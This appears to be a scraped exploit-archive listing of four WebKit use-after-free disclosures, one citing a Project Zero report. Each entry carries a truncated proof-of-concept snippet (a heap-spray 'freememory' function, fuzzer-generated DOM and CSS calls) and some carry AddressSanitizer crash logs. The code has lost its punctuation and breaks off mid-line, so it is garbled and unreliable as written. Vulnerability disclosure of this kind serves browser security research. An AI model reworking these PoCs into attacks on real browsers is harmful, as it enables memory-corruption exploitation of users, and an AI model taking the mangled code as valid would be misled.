WebKit - WebCore::Node::ensureRareData Use-After-Free
WebKit - WebCore::Node::ensureRareData Use-After-Free .class1 -webkit-mask-box-image-source: urlfoo; function freememory var a; forvar i=0;i100;i++ a = new Uint8Array10241024; document.implementation.createHTMLDocument"doc"; function jsfuzzer try var00097 = document.createElement"source"; catche...
WebKit - 'WebCore::PositionIterator::decrement' Use-After-Free
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1346 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= / function jsfuzzer...
WebKit - WebCore::Node::nextSibling Use-After-Free
WebKit - WebCore::Node::nextSibling Use-After-Free function freememory var a; forvar i=0;i !-- ================================================================= ASan log: ================================================================= ==29516==ERROR: AddressSanitizer: heap-use-after-free on...
WebKit - 'WebCore::Node::getFlag' Use-After-Free
-webkit-flow-into: textarea; function freememory var a; forvar i=0;i foo !-- ================================================================= ASan log: ================================================================= ==29717==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000053b3...